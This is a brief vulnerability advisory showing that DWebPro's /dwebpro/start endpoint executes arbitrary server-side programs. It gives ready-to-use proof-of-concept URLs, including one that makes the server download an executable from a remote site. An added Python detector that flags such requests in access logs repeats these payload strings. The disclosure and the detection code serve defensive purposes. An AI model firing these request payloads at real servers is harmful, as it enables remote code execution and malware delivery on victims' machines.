
DWebPro allows an invader to execute any program on the server side






The latest version of DWebPro allows an invader to execute any program. Just enter this in your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt

notepad.exe will then open a text file named hi at C:\ on the server side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe it will open a browser on the server side and download the file.

It's really dangerous.

I tested this on the latest version, but it may work on older versions as well.

Best Regards,

Rafael Sousa
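
One way to spot the requests described above in web access logs, added here as an example (not part of the original advisory and not DWebPro code): it flags requests to `/dwebpro/start` whose `file` value is an absolute Windows path, a UNC path or a remote URL, including percent-encoded forms. The Common Log Format layout, the client addresses and the timestamps are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Common Log Format; the request line is the quoted field.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
START_PATH = "/dwebpro/start"  # endpoint named in the advisory

ABS_WINDOWS = re.compile(r"^[A-Za-z]:[\\/]")         # C:\... or C:/...
UNC = re.compile(r"^[\\/]{2}")                        # \\host\share
REMOTE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")   # http://, ftp://, ...

def classify(line):
    """Return None for unrelated lines, else details of the start request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rstrip("/").lower() != START_PATH:
        return None
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    target = query.get("file", [""])[0].strip()
    if REMOTE.match(target):
        kind = "remote-url"
    elif ABS_WINDOWS.match(target) or UNC.match(target):
        kind = "absolute-path"
    else:
        kind = "other"
    return {"client": line.split(" ", 1)[0], "file": target,
            "params": query.get("params", [""])[0], "kind": kind}

def findings(lines):
    """Start requests whose file value is an absolute path or a remote URL."""
    hits = (classify(entry) for entry in lines)
    return [h for h in hits if h and h["kind"] != "other"]

# Constructed sample log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt HTTP/1.1" 200 0',
    r'192.0.2.11 - - [01/Jan/2000:10:00:05 +0000] "GET /dwebpro/start?file=C%3A%5Cwindows%5Csystem32%5Cnotepad.exe HTTP/1.1" 200 0',
    r'192.0.2.12 - - [01/Jan/2000:10:00:09 +0000] "GET /dwebpro/start?file=http://www.somesite.com.br/somefile.exe HTTP/1.1" 200 0',
    r'192.0.2.13 - - [01/Jan/2000:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(hit["client"], hit["kind"], hit["file"], hit["params"])
```
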
